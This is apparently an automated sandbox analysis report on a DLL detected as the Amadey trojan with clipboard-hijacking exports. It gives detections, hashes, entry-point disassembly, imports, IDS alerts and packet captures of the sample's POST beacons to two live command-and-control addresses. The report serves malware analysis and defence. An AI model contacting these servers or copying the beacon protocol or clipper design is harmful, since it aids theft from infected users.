        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574266 Sample: D72j5I83wU.dll Startdate: 13/12/2024 Architecture: WINDOWS Score: 92 25 Suricata IDS alerts for network traffic 2->25 27 Found malware configuration 2->27 29 Antivirus detection for URL or domain 2->29 31 3 other signatures 2->31 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 rundll32.exe 12 7->12         started        15 cmd.exe 1 7->15         started        17 5 other processes 7->17 dnsIp5 33 System process connects to network (likely due to code injection or exploit) 9->33 21 185.81.68.147, 49710, 49717, 80 KLNOPT-ASFI Finland 12->21 23 185.81.68.148, 49716, 49723, 80 KLNOPT-ASFI Finland 12->23 19 rundll32.exe 15->19         started        signatures6 process7

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        D72j5I83wU.dll47%ReversingLabsWin32.Trojan.Amadey
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://185.81.68.147/7vhfjke3/index.php_100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.phpf100%Avira URL Cloudphishing
        http://185.81.68.148/Fvu5jh4DbS/index.php100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.phpw100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.phpS100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.phpP100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.php~100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.php100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Br100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.php100%Avira URL Cloudmalware
        http://185.81.68.148/8Fvu5jh4DbS/index.php-100%Avira URL Cloudphishing
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://185.81.68.147/7vhfjke3/index.phptrue
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.148/8Fvu5jh4DbS/index.phptrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://185.81.68.147/7vhfjke3/index.php_rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.147/7vhfjke3/index.phpPrundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.147/7vhfjke3/index.phpSrundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.148/8Fvu5jh4DbS/index.phpfrundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Brrundll32.exe, 00000007.00000002.3789321814.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.147/7vhfjke3/index.phpwrundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.148/Fvu5jh4DbS/index.phprundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.148/8Fvu5jh4DbS/index.php~rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.148/8Fvu5jh4DbS/index.php-rundll32.exe, 0000000B.00000002.3790521828.00000000032F7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        185.81.68.147
        unknownFinland
        50108KLNOPT-ASFItrue
        185.81.68.148
        unknownFinland
        50108KLNOPT-ASFItrue
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1574266
        Start date and time:2024-12-13 07:47:39 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 7m 3s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:18
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:D72j5I83wU.dll
        renamed because original name is a hash value
        Original Sample Name:c2f3fbbbe6d5f48a71b6b168b1485866.dll
        Detection:MAL
        Classification:mal92.troj.spyw.evad.winDLL@18/0@0/2
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 9
        • Number of non-executed functions: 29
        Cookbook Comments:
        • Found application associated with file extension: .dll
        • Override analysis time to 240000 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: D72j5I83wU.dll
        TimeTypeDescription
        01:48:44API Interceptor1x Sleep call for process: loaddll32.exe modified
        01:49:17API Interceptor10555448x Sleep call for process: rundll32.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        185.81.68.147hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
        • 185.81.68.147/7vhfjke3/index.php?wal=1
        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
        • 185.81.68.147/7vhfjke3/index.php
        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
        • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
        • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
        185.81.68.148hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
        • 185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
        • 185.81.68.148/8Fvu5jh4DbS/index.php
        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
        • 185.81.68.148/8Fvu5jh4DbS/index.php
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        KLNOPT-ASFIhoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
        • 185.81.68.148
        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
        • 185.81.68.148
        eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147
        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
        • 185.81.68.148
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147
        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
        • 185.81.68.147
        tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.115
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.115
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.115
        KLNOPT-ASFIhoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
        • 185.81.68.148
        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
        • 185.81.68.148
        eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147
        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
        • 185.81.68.148
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147
        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
        • 185.81.68.147
        tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.147
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.115
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.115
        file.exeGet hashmaliciousRedLineBrowse
        • 185.81.68.115
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
        Entropy (8bit):6.36076412023942
        TrID:
        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
        • Generic Win/DOS Executable (2004/3) 0.20%
        • DOS Executable Generic (2002/1) 0.20%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:D72j5I83wU.dll
        File size:126'976 bytes
        MD5:c2f3fbbbe6d5f48a71b6b168b1485866
        SHA1:1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
        SHA256:c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
        SHA512:e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a
        SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
        TLSH:2BC34B213496C031D66D567E18A8ABF487BD6810DFB00DD77B840E7B8E642D2EE34D7A
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........
        Icon Hash:7ae282899bbab082
        Entrypoint:0x10007062
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x10000000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
        Time Stamp:0x675A9684 [Thu Dec 12 07:53:40 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:fdb088ba51afbf555d7a0f495212d8f1
        Instruction
        push ebp
        mov ebp, esp
        cmp dword ptr [ebp+0Ch], 01h
        jne 00007F2820B3F637h
        call 00007F2820B3FA0Ah
        push dword ptr [ebp+10h]
        push dword ptr [ebp+0Ch]
        push dword ptr [ebp+08h]
        call 00007F2820B3F4E3h
        add esp, 0Ch
        pop ebp
        retn 000Ch
        jmp 00007F2820B43352h
        push ebp
        mov ebp, esp
        sub esp, 0Ch
        lea ecx, dword ptr [ebp-0Ch]
        call 00007F2820B3EBE5h
        push 1001C6E0h
        lea eax, dword ptr [ebp-0Ch]
        push eax
        call 00007F2820B4009Dh
        int3
        push ebp
        mov ebp, esp
        and dword ptr [1001F708h], 00000000h
        sub esp, 24h
        or dword ptr [1001E00Ch], 01h
        push 0000000Ah
        call dword ptr [10016050h]
        test eax, eax
        je 00007F2820B3F7DFh
        and dword ptr [ebp-10h], 00000000h
        xor eax, eax
        push ebx
        push esi
        push edi
        xor ecx, ecx
        lea edi, dword ptr [ebp-24h]
        push ebx
        cpuid
        mov esi, ebx
        pop ebx
        mov dword ptr [edi], eax
        mov dword ptr [edi+04h], esi
        mov dword ptr [edi+08h], ecx
        xor ecx, ecx
        mov dword ptr [edi+0Ch], edx
        mov eax, dword ptr [ebp-24h]
        mov edi, dword ptr [ebp-1Ch]
        mov dword ptr [ebp-0Ch], eax
        xor edi, 6C65746Eh
        mov eax, dword ptr [ebp-18h]
        xor eax, 49656E69h
        mov dword ptr [ebp-08h], eax
        mov eax, dword ptr [ebp-20h]
        xor eax, 756E6547h
        mov dword ptr [ebp-04h], eax
        xor eax, eax
        inc eax
        push ebx
        cpuid
        mov esi, ebx
        pop ebx
        lea ebx, dword ptr [ebp-24h]
        mov dword ptr [ebx], eax
        mov eax, dword ptr [ebp-04h]
        mov dword ptr [ebx+04h], esi
        or eax, edi
        or eax, dword ptr [ebp-08h]
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x1cd100x9c.rdata
        IMAGE_DIRECTORY_ENTRY_IMPORT0x1cdac0x50.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000xf8.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x210000x1af8.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x1bb840x38.rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bbc00x40.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x160000x14c.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x143060x1440060ab5dc3d05117ecdfe5887a3e8a7c70False0.5100188078703703data6.54336981394925IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x160000x752a0x760008220ccdb3fd3e6b2a37ef117d10551bFalse0.4294226694915254data5.16092989937922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x1e0000x1fec0x1400070ceab71158e4b98b9fbb2974a658d3False0.094140625data1.5445177251659354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x200000xf80x2009f59a1f7f3b6dfefbfe8605086b5888eFalse0.333984375data2.5080557656497993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x210000x1af80x1c00f0da6f5f3bd34741cc0954192c9cb82cFalse0.7540457589285714data6.518393643652914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_MANIFEST0x200600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793
        DLLImport
        KERNEL32.dllGlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
        USER32.dllEmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
        WININET.dllInternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle
        NameOrdinalAddress
        ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z10x10001d60
        ??4CClipperDLL@@QAEAAV0@ABV0@@Z20x10001d60
        Main30x100059a0
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States
        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2024-12-13T07:48:45.709940+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.1149716185.81.68.14880TCP
        2024-12-13T07:48:48.330355+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.1149723185.81.68.14880TCP
        TimestampSource PortDest PortSource IPDest IP
        Dec 13, 2024 07:48:42.660928965 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:42.780616045 CET8049710185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:42.780700922 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:42.780961037 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:42.900629044 CET8049710185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:44.188534975 CET8049710185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:44.188678980 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:44.193975925 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:44.313783884 CET8049716185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:44.313873053 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:44.320168972 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:44.440151930 CET8049716185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:45.304009914 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:45.423863888 CET8049717185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:45.426007032 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:45.438831091 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:45.558722019 CET8049717185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:45.706077099 CET8049716185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:45.709939957 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:46.829248905 CET8049717185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:46.829328060 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:46.832854986 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:46.952676058 CET8049723185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:46.952817917 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:46.953031063 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:47.073092937 CET8049723185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:48.330281019 CET8049723185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:48.330354929 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:49.202943087 CET8049710185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:49.203054905 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:50.719304085 CET8049716185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:50.719364882 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:48:51.843630075 CET8049717185.81.68.147192.168.2.11
        Dec 13, 2024 07:48:51.843749046 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:48:53.329134941 CET8049723185.81.68.148192.168.2.11
        Dec 13, 2024 07:48:53.329267025 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:32.626494884 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:32.630414009 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:33.063533068 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:33.063548088 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:33.702119112 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:33.751040936 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:34.954152107 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:35.064604044 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:35.267195940 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:35.267206907 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:35.751131058 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:35.766686916 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:36.563519955 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:36.563536882 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:37.563508034 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:37.563523054 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:37.860398054 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:37.954160929 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:40.454149961 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:40.563510895 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:42.563520908 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:42.563528061 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:45.413139105 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:45.752024889 CET4971780192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:52.360394001 CET4971080192.168.2.11185.81.68.147
        Dec 13, 2024 07:50:52.566028118 CET4971680192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:55.458013058 CET4972380192.168.2.11185.81.68.148
        Dec 13, 2024 07:50:56.065011024 CET4971780192.168.2.11185.81.68.147
        • 185.81.68.147
        • 185.81.68.148
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.1149710185.81.68.147807612C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Dec 13, 2024 07:48:42.780961037 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: 185.81.68.147
        Content-Length: 5
        Cache-Control: no-cache
        Data Raw: 77 6c 74 3d 31
        Data Ascii: wlt=1
        Dec 13, 2024 07:48:44.188534975 CET711INHTTP/1.1 200 OK
        Date: Fri, 13 Dec 2024 14:48:43 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        X-Powered-By: PHP/8.2.12
        Content-Length: 512
        Content-Type: text/html; charset=UTF-8
        Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
        Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.1149716185.81.68.148807612C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Dec 13, 2024 07:48:44.320168972 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: 185.81.68.148
        Content-Length: 5
        Cache-Control: no-cache
        Data Raw: 77 6c 74 3d 31
        Data Ascii: wlt=1
        Dec 13, 2024 07:48:45.706077099 CET711INHTTP/1.1 200 OK
        Date: Fri, 13 Dec 2024 14:48:44 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        X-Powered-By: PHP/8.2.12
        Content-Length: 512
        Content-Type: text/html; charset=UTF-8
        Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
        Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.1149717185.81.68.147807760C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Dec 13, 2024 07:48:45.438831091 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: 185.81.68.147
        Content-Length: 5
        Cache-Control: no-cache
        Data Raw: 77 6c 74 3d 31
        Data Ascii: wlt=1
        Dec 13, 2024 07:48:46.829248905 CET711INHTTP/1.1 200 OK
